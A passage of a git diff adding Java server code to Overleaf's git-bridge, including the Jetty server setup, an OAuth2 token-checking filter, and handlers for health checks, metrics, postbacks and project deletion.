uk.ac.ic.wlgitbridge.bridge.repo.FSGitRepoStore; +import uk.ac.ic.wlgitbridge.bridge.repo.RepoStore; +import uk.ac.ic.wlgitbridge.bridge.repo.RepoStoreConfig; +import uk.ac.ic.wlgitbridge.bridge.snapshot.NetSnapshotApi; +import uk.ac.ic.wlgitbridge.bridge.snapshot.SnapshotApi; +import uk.ac.ic.wlgitbridge.bridge.swap.store.SwapStore; +import uk.ac.ic.wlgitbridge.git.servlet.WLGitServlet; +import uk.ac.ic.wlgitbridge.snapshot.base.SnapshotAPIRequest; +import uk.ac.ic.wlgitbridge.util.Log; +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Created by Winston on 02/11/14. + */ + +/* + * Class for the actual server. + */ +public class GitBridgeServer { + + private final Bridge bridge; + + private final Server jettyServer; + + private final int port; + private String rootGitDirectoryPath; + private String apiBaseURL; + + public GitBridgeServer(Config config) throws ServletException { + org.eclipse.jetty.util.log.Log.setLog(new NullLogger()); + this.port = config.getPort(); + this.rootGitDirectoryPath = config.getRootGitDirectory(); + RepoStore repoStore = + new FSGitRepoStore( + rootGitDirectoryPath, config.getRepoStore().flatMap(RepoStoreConfig::getMaxFileSize)); + DBStore dbStore = + new SqliteDBStore( + Paths.get(repoStore.getRootDirectory().getAbsolutePath()) + .resolve(".wlgb") + .resolve("wlgb.db") + .toFile(), + config.getSqliteHeapLimitBytes()); + SwapStore swapStore = SwapStore.fromConfig(config.getSwapStore()); + SnapshotApi snapshotApi = new NetSnapshotApi(); + bridge = Bridge.make(config, repoStore, dbStore, swapStore, snapshotApi); + jettyServer = new Server(); + configureJettyServer(config, repoStore, snapshotApi); + apiBaseURL = config.getAPIBaseURL(); + SnapshotAPIRequest.setBaseURL(apiBaseURL); + Util.setServiceName(config.getServiceName()); + Util.setPostbackURL(config.getPostbackURL()); + Util.setPort(config.getPort()); + } + + /* + * Starts the server on the port given on construction. 
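+   *
+   * The start-up order below matters: the database is checked before Jetty
+   * starts accepting traffic, and background jobs only run once the server is
+   * up. On success the log shows lines like (values illustrative):
+   *
+   *   Listening on port: 8000
+   *   Bridged to: https://<overleaf-host>/api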
+ */ + public void start() { + try { + bridge.checkDB(); + jettyServer.start(); + bridge.startBackgroundJobs(); + Log.info(Util.getServiceName() + "-Git Bridge server started"); + Log.info("Listening on port: " + port); + Log.info("Bridged to: " + apiBaseURL); + Log.info("Postback base URL: " + Util.getPostbackURL()); + Log.info("Root git directory path: " + rootGitDirectoryPath); + } catch (BindException e) { + Log.error("Failed to bind Jetty", e); + } catch (Exception e) { + Log.error("Failed to start Jetty", e); + } + } + + public void stop() { + try { + jettyServer.stop(); + } catch (Exception e) { + Log.error("Failed to stop Jetty", e); + } + } + + private void configureJettyServer(Config config, RepoStore repoStore, SnapshotApi snapshotApi) + throws ServletException { + ServerConnector connector = new ServerConnector(this.jettyServer); + connector.setPort(config.getPort()); + connector.setHost(config.getBindIp()); + connector.setIdleTimeout(config.getIdleTimeout()); + this.jettyServer.addConnector(connector); + + HandlerCollection handlers = new HandlerList(); + handlers.addHandler(new CORSHandler(config.getAllowedCorsOrigins())); + handlers.addHandler(initApiHandler()); + handlers.addHandler(initBaseHandler()); + handlers.addHandler(initGitHandler(config, repoStore, snapshotApi)); + jettyServer.setHandler(handlers); + } + + private Handler initBaseHandler() { + ContextHandler base = new ContextHandler(); + base.setContextPath("/"); + HandlerCollection handlers = new HandlerList(); + handlers.addHandler(new StatusHandler(bridge)); + handlers.addHandler(new HealthCheckHandler(bridge)); + handlers.addHandler(new GitLfsHandler(bridge)); + handlers.addHandler(new PrometheusHandler()); + handlers.addHandler(new DiagnosticsHandler()); + base.setHandler(handlers); + return base; + } + + private Handler initApiHandler() { + ContextHandler api = new ContextHandler(); + api.setContextPath("/api"); + + HandlerCollection handlers = new HandlerList(); + handlers.addHandler(initResourceHandler()); + handlers.addHandler(new PostbackHandler(bridge)); + handlers.addHandler(new ProjectDeletionHandler(bridge)); + handlers.addHandler(new DefaultHandler()); + + api.setHandler(handlers); + + ProductionErrorHandler errorHandler = new ProductionErrorHandler(); + api.setErrorHandler(errorHandler); + return api; + } + + private Handler initGitHandler(Config config, RepoStore repoStore, SnapshotApi snapshotApi) + throws ServletException { + final ServletContextHandler servletContextHandler = + new ServletContextHandler(ServletContextHandler.SESSIONS); + if (config.getOauth2Server() != null) { + Filter filter = + new Oauth2Filter(snapshotApi, config.getOauth2Server(), config.isUserPasswordEnabled()); + servletContextHandler.addFilter( + new FilterHolder(filter), "/*", EnumSet.of(DispatcherType.REQUEST)); + } + servletContextHandler.setContextPath("/"); + servletContextHandler.addServlet( + new ServletHolder(new WLGitServlet(servletContextHandler, repoStore, bridge)), "/*"); + ProductionErrorHandler errorHandler = new ProductionErrorHandler(); + servletContextHandler.setErrorHandler(errorHandler); + return servletContextHandler; + } + + private Handler initResourceHandler() { + ResourceHandler resourceHandler = new FileHandler(bridge); + resourceHandler.setResourceBase(new File(rootGitDirectoryPath, ".wlgb/atts").getAbsolutePath()); + return resourceHandler; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/GitLfsHandler.java 
b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/GitLfsHandler.java new file mode 100644 index 0000000..67ab2b3 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/GitLfsHandler.java @@ -0,0 +1,36 @@ +package uk.ac.ic.wlgitbridge.server; + +import java.io.IOException; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import org.eclipse.jetty.server.Request; +import org.eclipse.jetty.server.handler.AbstractHandler; +import uk.ac.ic.wlgitbridge.bridge.Bridge; +import uk.ac.ic.wlgitbridge.util.Log; + +public class GitLfsHandler extends AbstractHandler { + + private final Bridge bridge; + + public GitLfsHandler(Bridge bridge) { + this.bridge = bridge; + } + + @Override + public void handle( + String target, Request baseRequest, HttpServletRequest request, HttpServletResponse response) + throws IOException { + String method = baseRequest.getMethod(); + if (("POST".equals(method)) + && target != null + && target.matches("^/[0-9a-z]+\\.git/info/lfs/objects/batch/?$")) { + Log.debug(method + " <- /<project>.git/info/lfs/objects/batch"); + response.setContentType("application/vnd.git-lfs+json"); + response.setStatus(422); + response + .getWriter() + .println("{\"message\": \"ERROR: Git LFS is not supported on Overleaf\"}"); + baseRequest.setHandled(true); + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/HealthCheckHandler.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/HealthCheckHandler.java new file mode 100644 index 0000000..fe2ad43 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/HealthCheckHandler.java @@ -0,0 +1,39 @@ +package uk.ac.ic.wlgitbridge.server; + +import java.io.IOException; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import org.eclipse.jetty.server.Request; +import org.eclipse.jetty.server.handler.AbstractHandler; +import uk.ac.ic.wlgitbridge.bridge.Bridge; +import uk.ac.ic.wlgitbridge.util.Log; + +public class HealthCheckHandler extends AbstractHandler { + + private final Bridge bridge; + + public HealthCheckHandler(Bridge bridge) { + this.bridge = bridge; + } + + @Override + public void handle( + String target, Request baseRequest, HttpServletRequest request, HttpServletResponse response) + throws IOException { + String method = baseRequest.getMethod(); + if (("GET".equals(method) || "HEAD".equals(method)) + && target != null + && target.matches("^/health_check/?$")) { + Log.debug(method + " <- /health_check"); + baseRequest.setHandled(true); + response.setContentType("text/plain"); + if (bridge.healthCheck()) { + response.setStatus(200); + response.getWriter().println("ok"); + } else { + response.setStatus(500); + response.getWriter().println("failed"); + } + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/Oauth2Filter.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/Oauth2Filter.java new file mode 100644 index 0000000..586a21a --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/Oauth2Filter.java @@ -0,0 +1,332 @@ +package uk.ac.ic.wlgitbridge.server; + +import com.google.api.client.auth.oauth2.*; +import com.google.api.client.http.GenericUrl; +import com.google.api.client.http.HttpHeaders; +import com.google.api.client.http.HttpRequest; +import com.google.api.client.http.HttpResponse; +import java.io.IOException; +import java.io.PrintWriter; +import 
java.io.UnsupportedEncodingException; +import java.util.*; +import javax.servlet.*; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import org.apache.commons.codec.binary.Base64; +import uk.ac.ic.wlgitbridge.bridge.snapshot.SnapshotApi; +import uk.ac.ic.wlgitbridge.util.Instance; +import uk.ac.ic.wlgitbridge.util.Log; +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Created by winston on 25/10/15. + */ +public class Oauth2Filter implements Filter { + + public static final String ATTRIBUTE_KEY = "oauth2"; + + private final SnapshotApi snapshotApi; + + private final String oauth2Server; + + private final boolean isUserPasswordEnabled; + + public Oauth2Filter(SnapshotApi snapshotApi, String oauth2Server, boolean isUserPasswordEnabled) { + this.snapshotApi = snapshotApi; + this.oauth2Server = oauth2Server; + this.isUserPasswordEnabled = isUserPasswordEnabled; + } + + @Override + public void init(FilterConfig filterConfig) {} + + /* + * The original request from git will not contain the Authorization header. + * + * So, for projects that need auth, we return 401. Git will swallow this + * and prompt the user for user/pass, and then make a brand new request. + * + * @param servletRequest + * + * @param servletResponse + * + * @param filterChain + * + * @throws IOException + * + * @throws ServletException + */ + @Override + public void doFilter( + ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) + throws IOException, ServletException { + HttpServletRequest request = (HttpServletRequest) servletRequest; + HttpServletResponse response = (HttpServletResponse) servletResponse; + String requestUri = request.getRequestURI(); + + if (requestUri.startsWith("/project")) { + Log.info("[{}] Invalid request URI", requestUri); + sendResponse( + response, 404, Arrays.asList("Invalid Project ID (must not have a '/project' prefix)")); + return; + } + + String projectId = Util.removeAllSuffixes(requestUri.split("/")[1], ".git"); + + BasicAuthCredentials basicAuthCreds = getBasicAuthCredentials(request); + if (basicAuthCreds == null) { + handleNeedAuthorization(projectId, "(unknown)", request, response); + return; + } + String username = basicAuthCreds.getUsername(); + String password = basicAuthCreds.getPassword(); + + if (isLinkSharingId(projectId)) { + handleLinkSharingId(projectId, username, request, response); + return; + } + if (!isProjectId(projectId)) { + handleBadProjectId(projectId, username, request, response); + return; + } + + final Credential cred = + new Credential.Builder(BearerToken.authorizationHeaderAccessMethod()).build(); + + if (username.equals("git")) { + Log.debug("[{}] username is 'git', skipping password grant flow", projectId); + + // Check that the access token is valid. In principle, we could + // wait until we make the actual request to the web api, but the + // JGit API doesn't make it easy to reply with a 401 and a custom + // error message. This is something we can do in this filter, so as + // a workaround, we use the /oauth/token/info endpoint to verify + // the access token. + // + // It's still theoretically possible for the web api request to + // fail later (for example, in the unlikely event that the token + // expired between the two requests). In that case, JGit will + // return a 401 without a custom error message. 
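+ //
+ // As a rough sketch, the check below amounts to this HTTP exchange
+ // against the configured OAuth2 server (see checkAccessToken further
+ // down in this class):
+ //
+ //   GET <oauth2Server>/oauth/token/info?client_ip=<client ip>
+ //   Authorization: Bearer <token supplied as the git password>
+ //
+ // A 2xx status means the token is valid; 401, 429 and other >= 400
+ // statuses are mapped to the specific error handlers below.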
+ int statusCode = checkAccessToken(this.oauth2Server, password, getClientIp(request));
+ if (statusCode == 429) {
+ handleRateLimit(projectId, username, request, response);
+ return;
+ } else if (statusCode == 401) {
+ handleBadAccessToken(projectId, request, response);
+ return;
+ } else if (statusCode >= 400) {
+ handleUnknownOauthServerError(projectId, statusCode, request, response);
+ return;
+ }
+ cred.setAccessToken(password);
+ } else if (this.isUserPasswordEnabled) {
+ // password auth has been deprecated for git-bridge
+ handlePasswordAuthenticationDeprecation(projectId, username, request, response);
+ return;
+ } else {
+ handleNeedAuthorization(projectId, username, request, response);
+ return;
+ }
+
+ servletRequest.setAttribute(ATTRIBUTE_KEY, cred);
+ filterChain.doFilter(servletRequest, servletResponse);
+ }
+
+ @Override
+ public void destroy() {}
+
+ private boolean isLinkSharingId(String projectId) {
+ return projectId.matches("^[0-9]+[bcdfghjklmnpqrstvwxyz]{6,12}$");
+ }
+
+ private boolean isProjectId(String projectId) {
+ return projectId.matches("^[0-9a-f]{24}$");
+ }
+
+ private void sendResponse(HttpServletResponse response, int code, List<String> lines)
+ throws IOException {
+ response.setContentType("text/plain");
+ response.setStatus(code);
+ PrintWriter w = response.getWriter();
+ for (String line : lines) {
+ w.println(line);
+ }
+ w.close();
+ }
+
+ private void handleLinkSharingId(
+ String projectId, String username, HttpServletRequest request, HttpServletResponse response)
+ throws IOException {
+ Log.info("[{}] Link-sharing id, User '{}' ip={}", projectId, username, getClientIp(request));
+ sendResponse(
+ response,
+ 404,
+ Arrays.asList(
+ "Git access via link sharing link is not supported.",
+ "",
+ "You can find the project's git remote url by opening it in your browser",
+ "and selecting Git from the left sidebar in the project view.",
+ "",
+ "If this is unexpected, please contact us at support@overleaf.com, or",
+ "see https://www.overleaf.com/learn/how-to/Git_integration for more information."));
+ }
+
+ private void handleBadProjectId(
+ String projectId, String username, HttpServletRequest request, HttpServletResponse response)
+ throws IOException {
+ Log.info("[{}] Bad project id, User '{}' ip={}", projectId, username, getClientIp(request));
+ sendResponse(
+ response,
+ 404,
+ Arrays.asList(
+ "This Overleaf project does not exist.",
+ "",
+ "If this is unexpected, please contact us at support@overleaf.com, or",
+ "see https://www.overleaf.com/learn/how-to/Git_integration for more information."));
+ }
+
+ private void handleRateLimit(
+ String projectId, String username, HttpServletRequest request, HttpServletResponse response)
+ throws IOException {
+ Log.info("[{}] Rate limit, User '{}' ip={}", projectId, username, getClientIp(request));
+ sendResponse(
+ response, 429, Arrays.asList("Rate limit exceeded.
Please wait and try again later.")); + } + + private void handleNeedAuthorization( + String projectId, String username, HttpServletRequest request, HttpServletResponse response) + throws IOException { + Log.info("[{}] Unauthorized, User '{}' ip={}", projectId, username, getClientIp(request)); + response.setHeader("WWW-Authenticate", "Basic realm=\"Git Bridge\""); + if (this.isUserPasswordEnabled) { + sendResponse( + response, + 401, + Arrays.asList( + "Log in using the email address and password you use for Overleaf.", + "", + "*Note*: if you use a provider such as Google or Twitter to sign into", + "your Overleaf account, you will need to set a password.", + "", + "See our help page for more support:", + "https://www.overleaf.com/learn/how-to/Troubleshooting_git_bridge_problems")); + } else { + sendResponse( + response, + 401, + Arrays.asList( + "Log in with the username 'git' and enter your Git authentication token", + "when prompted for a password.", + "", + "You can generate and manage your Git authentication tokens in", + "your Overleaf Account Settings.")); + } + } + + private void handleBadAccessToken( + String projectId, HttpServletRequest request, HttpServletResponse response) + throws IOException { + Log.info("[{}] Bad access token, ip={}", projectId, getClientIp(request)); + sendResponse( + response, + 401, + Arrays.asList( + "Enter your Git authentication token when prompted for a password.", + "", + "You can generate and manage your Git authentication tokens in", + "your Overleaf Account Settings.")); + } + + private int checkAccessToken(String oauth2Server, String accessToken, String clientIp) + throws IOException { + GenericUrl url = new GenericUrl(oauth2Server + "/oauth/token/info?client_ip=" + clientIp); + HttpRequest request = Instance.httpRequestFactory.buildGetRequest(url); + HttpHeaders headers = new HttpHeaders(); + headers.setAuthorization("Bearer " + accessToken); + request.setHeaders(headers); + request.setThrowExceptionOnExecuteError(false); + HttpResponse response = request.execute(); + int statusCode = response.getStatusCode(); + response.disconnect(); + return statusCode; + } + + private void handleUnknownOauthServerError( + String projectId, int statusCode, HttpServletRequest request, HttpServletResponse response) + throws IOException { + Log.info( + "[{}] OAuth server error, statusCode={}, ip={}", + projectId, + statusCode, + getClientIp(request)); + sendResponse(response, 500, Arrays.asList("Unexpected server error. Please try again later.")); + } + + private void handlePasswordAuthenticationDeprecation( + String projectId, String username, HttpServletRequest request, HttpServletResponse response) + throws IOException { + if (username.contains("@")) { + Log.info("[{}] Password authentication deprecated, ip={}", projectId, getClientIp(request)); + sendResponse( + response, + 403, + Arrays.asList( + "Overleaf now only supports Git authentication tokens to access git. See: https://www.overleaf.com/learn/how-to/Git_integration_authentication_tokens")); + } else { + Log.info("[{}] Wrong git URL format, ip={}", projectId, getClientIp(request)); + sendResponse( + response, + 403, + Arrays.asList( + "Overleaf now only supports Git authentication tokens to access git. See: https://www.overleaf.com/learn/how-to/Git_integration_authentication_tokens", + "Please make sure your Git URL is correctly formatted. 
For example: https://git@git.overleaf.com/<YOUR_PROJECT_ID> or https://git:<AUTHENTICATION_TOKEN>@git.overleaf.com/<YOUR_PROJECT_ID>"));
+ }
+ }
+
+ /*
+ * Gets the remote IP from the request.
+ */
+ private String getClientIp(HttpServletRequest request) {
+ String clientIp = request.getHeader("X-Forwarded-For");
+ if (clientIp == null) {
+ clientIp = request.getRemoteAddr();
+ }
+ return clientIp;
+ }
+
+ /*
+ * Extract basic auth credentials from the request.
+ *
+ * Returns null if valid basic auth credentials couldn't be found.
+ */
+ private BasicAuthCredentials getBasicAuthCredentials(HttpServletRequest request) {
+ String authHeader = request.getHeader("Authorization");
+ if (authHeader == null) {
+ return null;
+ }
+
+ StringTokenizer st = new StringTokenizer(authHeader);
+ if (!st.hasMoreTokens()) {
+ return null;
+ }
+ String basic = st.nextToken();
+ if (!basic.equalsIgnoreCase("Basic")) {
+ return null;
+ }
+ // Guard against a bare "Basic" header with no credentials part, which
+ // would otherwise make the nextToken() call below throw.
+ if (!st.hasMoreTokens()) {
+ return null;
+ }
+
+ String credentials = null;
+ try {
+ credentials = new String(Base64.decodeBase64(st.nextToken()), "UTF-8");
+ } catch (UnsupportedEncodingException e) {
+ return null;
+ }
+
+ String[] split = credentials.split(":", 2);
+ if (split.length != 2) {
+ return null;
+ }
+ String username = split[0];
+ String password = split[1];
+ return new BasicAuthCredentials(username, password);
+ }
+}
diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/PostbackContents.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/PostbackContents.java new file mode 100644 index 0000000..f925975 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/PostbackContents.java @@ -0,0 +1,71 @@
+package uk.ac.ic.wlgitbridge.server;
+
+import com.google.gson.Gson;
+import com.google.gson.JsonElement;
+import com.google.gson.JsonObject;
+import uk.ac.ic.wlgitbridge.bridge.Bridge;
+import uk.ac.ic.wlgitbridge.snapshot.base.JSONSource;
+import uk.ac.ic.wlgitbridge.snapshot.push.exception.SnapshotPostException;
+import uk.ac.ic.wlgitbridge.snapshot.push.exception.SnapshotPostExceptionBuilder;
+import uk.ac.ic.wlgitbridge.snapshot.push.exception.UnexpectedPostbackException;
+import uk.ac.ic.wlgitbridge.util.Util;
+
+/*
+ * Created by Winston on 17/11/14.
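+ *
+ * Parses the postback body sent by the web service: a code of
+ * "upToDate" carries the new latestVerId, while any other code is
+ * converted into a SnapshotPostException via SnapshotPostExceptionBuilder
+ * and reported back to the bridge.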
+ */ +public class PostbackContents implements JSONSource { + + private static final String CODE_SUCCESS = "upToDate"; + + private final Bridge bridge; + private final String projectName; + private final String postbackKey; + + private final SnapshotPostExceptionBuilder snapshotPostExceptionBuilder; + + private int versionID; + private SnapshotPostException exception; + + public PostbackContents(Bridge bridge, String projectName, String postbackKey, String contents) { + this.bridge = bridge; + this.projectName = projectName; + this.postbackKey = postbackKey; + snapshotPostExceptionBuilder = new SnapshotPostExceptionBuilder(); + fromJSON(new Gson().fromJson(contents, JsonElement.class)); + } + + @Override + public void fromJSON(JsonElement json) { + JsonObject responseObject = json.getAsJsonObject(); + String code = Util.getCodeFromResponse(responseObject); + setResult(responseObject, code); + } + + public void processPostback() throws UnexpectedPostbackException { + if (exception == null) { + bridge.postbackReceivedSuccessfully(projectName, postbackKey, versionID); + } else { + bridge.postbackReceivedWithException(projectName, postbackKey, exception); + } + } + + private void setResult(JsonObject responseObject, String code) { + if (code.equals(CODE_SUCCESS)) { + setVersionID(responseObject); + } else { + setException(responseObject, code); + } + } + + private void setVersionID(JsonObject responseObject) { + versionID = responseObject.get("latestVerId").getAsInt(); + } + + private void setException(JsonObject responseObject, String code) { + try { + exception = snapshotPostExceptionBuilder.build(code, responseObject); + } catch (UnexpectedPostbackException e) { + throw new RuntimeException(e); + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/PostbackHandler.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/PostbackHandler.java new file mode 100644 index 0000000..a121844 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/PostbackHandler.java @@ -0,0 +1,71 @@ +package uk.ac.ic.wlgitbridge.server; + +import com.google.gson.JsonObject; +import com.google.gson.JsonPrimitive; +import java.io.IOException; +import javax.servlet.ServletException; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import org.eclipse.jetty.server.Request; +import org.eclipse.jetty.server.handler.AbstractHandler; +import uk.ac.ic.wlgitbridge.bridge.Bridge; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.UnexpectedPostbackException; +import uk.ac.ic.wlgitbridge.util.Log; +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Created by Winston on 16/11/14. 
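+ *
+ * Receives the web service's postback after a push. Roughly (a sketch;
+ * the "/api" context prefix is stripped before this handler sees the
+ * target):
+ *
+ *   POST /api/<projectName>/<postbackKey>/postback
+ *
+ * with a JSON body, answered with {"code": "success"}, or 409 and
+ * {"code": "unexpectedPostback"} for an unrecognised postback key.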
+ */ +public class PostbackHandler extends AbstractHandler { + + private final Bridge bridge; + + public PostbackHandler(Bridge bridge) { + this.bridge = bridge; + } + + @Override + public void handle( + String target, Request baseRequest, HttpServletRequest request, HttpServletResponse response) + throws IOException, ServletException { + Log.debug("PostbackHandler: " + baseRequest.getMethod() + " <- " + baseRequest.getHttpURI()); + try { + if (request.getMethod().equals("POST") && target.endsWith("postback")) { + response.setContentType("application/json"); + String contents = Util.getContentsOfReader(request.getReader()); + String[] parts = target.split("/"); + if (parts.length < 4) { + throw new ServletException(); + } + String projectName = parts[1]; + String postbackKey = parts[2]; + PostbackContents postbackContents = + new PostbackContents(bridge, projectName, postbackKey, contents); + JsonObject body = new JsonObject(); + + try { + postbackContents.processPostback(); + } catch (UnexpectedPostbackException e) { + response.setStatus(HttpServletResponse.SC_CONFLICT); + body.add("code", new JsonPrimitive("unexpectedPostback")); + response.getWriter().println(body); + baseRequest.setHandled(true); + return; + } + response.setStatus(HttpServletResponse.SC_OK); + body.add("code", new JsonPrimitive("success")); + response.getWriter().println(body); + baseRequest.setHandled(true); + } + } catch (IOException e) { + Log.warn("IOException when handling postback to target: " + target, e); + throw e; + } catch (ServletException e) { + Log.warn("ServletException when handling postback to target: " + target, e); + throw e; + } catch (RuntimeException e) { + Log.warn("RuntimeException when handling postback to target: " + target, e); + throw e; + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/ProductionErrorHandler.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/ProductionErrorHandler.java new file mode 100644 index 0000000..ca21a82 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/ProductionErrorHandler.java @@ -0,0 +1,22 @@ +package uk.ac.ic.wlgitbridge.server; + +import java.io.IOException; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import org.eclipse.jetty.server.handler.ErrorHandler; + +public class ProductionErrorHandler extends ErrorHandler { + @Override + public void handle( + String target, + org.eclipse.jetty.server.Request baseRequest, + HttpServletRequest request, + HttpServletResponse response) + throws IOException { + response + .getWriter() + .append("{\"message\":\"HTTP error ") + .append(String.valueOf(response.getStatus())) + .append("\"}"); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/ProjectDeletionHandler.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/ProjectDeletionHandler.java new file mode 100644 index 0000000..731a75e --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/ProjectDeletionHandler.java @@ -0,0 +1,35 @@ +package uk.ac.ic.wlgitbridge.server; + +import java.io.IOException; +import java.util.regex.Matcher; +import java.util.regex.Pattern; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import org.eclipse.jetty.server.Request; +import org.eclipse.jetty.server.handler.AbstractHandler; +import uk.ac.ic.wlgitbridge.bridge.Bridge; + +public class ProjectDeletionHandler extends AbstractHandler { + 
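+ // Handles DELETE /api/projects/<24-hex-project-id>; the "/api" context
+ // prefix is stripped before the target is matched against routePattern.
+ // A hypothetical invocation (host and port are made up for illustration):
+ //
+ //   curl -X DELETE http://git-bridge:8000/api/projects/507f1f77bcf86cd799439011
+ //
+ // On a match, the bridge deletes the project and 204 No Content is returned.
+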
+ private final Bridge bridge;
+ private final Pattern routePattern = Pattern.compile("^/projects/([0-9a-f]{24})$");
+
+ public ProjectDeletionHandler(Bridge bridge) {
+ this.bridge = bridge;
+ }
+
+ @Override
+ public void handle(
+ String target, Request baseRequest, HttpServletRequest request, HttpServletResponse response)
+ throws IOException {
+ String method = baseRequest.getMethod();
+ // Check the target for null before building the matcher; calling
+ // routePattern.matcher(null) would throw a NullPointerException.
+ if ("DELETE".equals(method) && target != null) {
+ Matcher matcher = routePattern.matcher(target);
+ if (matcher.matches()) {
+ String projectName = matcher.group(1);
+ response.setContentType("text/plain");
+ response.setStatus(204);
+ this.bridge.deleteProject(projectName);
+ baseRequest.setHandled(true);
+ }
+ }
+ }
+}
diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/PrometheusHandler.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/PrometheusHandler.java new file mode 100644 index 0000000..315b458 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/PrometheusHandler.java @@ -0,0 +1,65 @@
+package uk.ac.ic.wlgitbridge.server;
+
+import io.prometheus.client.CollectorRegistry;
+import io.prometheus.client.exporter.common.TextFormat;
+import io.prometheus.client.hotspot.DefaultExports;
+import java.io.BufferedWriter;
+import java.io.IOException;
+import java.io.Writer;
+import java.util.Arrays;
+import java.util.Collections;
+import java.util.HashSet;
+import java.util.Set;
+import javax.servlet.ServletException;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+import org.eclipse.jetty.server.Request;
+import org.eclipse.jetty.server.handler.AbstractHandler;
+import uk.ac.ic.wlgitbridge.util.Log;
+
+public class PrometheusHandler extends AbstractHandler {
+
+ public PrometheusHandler() {
+ DefaultExports.initialize();
+ }
+
+ @Override
+ public void handle(
+ String target, Request baseRequest, HttpServletRequest request, HttpServletResponse response)
+ throws IOException, ServletException {
+ String method = baseRequest.getMethod();
+ if (("GET".equals(method)) && target != null && target.matches("^/metrics/?$")) {
+ Log.debug(method + " <- /metrics");
+ this.printMetrics(request, response);
+ baseRequest.setHandled(true);
+ }
+ }
+
+ private void printMetrics(HttpServletRequest request, HttpServletResponse response)
+ throws ServletException, IOException {
+ response.setStatus(200);
+ String contentType = TextFormat.chooseContentType(request.getHeader("Accept"));
+ response.setContentType(contentType);
+
+ Writer writer = new BufferedWriter(response.getWriter());
+
+ try {
+ TextFormat.writeFormat(
+ contentType,
+ writer,
+ CollectorRegistry.defaultRegistry.filteredMetricFamilySamples(parse(request)));
+ writer.flush();
+ } finally {
+ writer.close();
+ }
+ }
+
+ // Optional ?name[]=<metric> query parameters restrict which metric
+ // families are written out; with none given, all families are returned.
+ private Set<String> parse(HttpServletRequest req) {
+ String[] includedParam = req.getParameterValues("name[]");
+ if (includedParam == null) {
+ return Collections.emptySet();
+ } else {
+ return new HashSet<String>(Arrays.asList(includedParam));
+ }
+ }
+}
diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/StatusHandler.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/StatusHandler.java new file mode 100644 index 0000000..6750fa0 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/StatusHandler.java @@ -0,0 +1,34 @@
+package uk.ac.ic.wlgitbridge.server;
+
+import java.io.IOException;
+import javax.servlet.http.HttpServletRequest;
+import
javax.servlet.http.HttpServletResponse; +import org.eclipse.jetty.server.Request; +import org.eclipse.jetty.server.handler.AbstractHandler; +import uk.ac.ic.wlgitbridge.bridge.Bridge; +import uk.ac.ic.wlgitbridge.util.Log; + +public class StatusHandler extends AbstractHandler { + + private final Bridge bridge; + + public StatusHandler(Bridge bridge) { + this.bridge = bridge; + } + + @Override + public void handle( + String target, Request baseRequest, HttpServletRequest request, HttpServletResponse response) + throws IOException { + String method = baseRequest.getMethod(); + if (("GET".equals(method) || "HEAD".equals(method)) + && target != null + && target.matches("^/status/?$")) { + Log.debug(method + " <- /status"); + baseRequest.setHandled(true); + response.setContentType("text/plain"); + response.setStatus(200); + response.getWriter().println("ok"); + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/ForbiddenException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/ForbiddenException.java new file mode 100644 index 0000000..9068223 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/ForbiddenException.java @@ -0,0 +1,25 @@ +package uk.ac.ic.wlgitbridge.snapshot.base; + +import com.google.gson.JsonElement; +import java.util.Arrays; +import java.util.List; +import uk.ac.ic.wlgitbridge.git.exception.SnapshotAPIException; + +/* + * Created by winston on 25/10/15. + */ +public class ForbiddenException extends SnapshotAPIException { + + @Override + public void fromJSON(JsonElement json) {} + + @Override + public String getMessage() { + return "forbidden"; + } 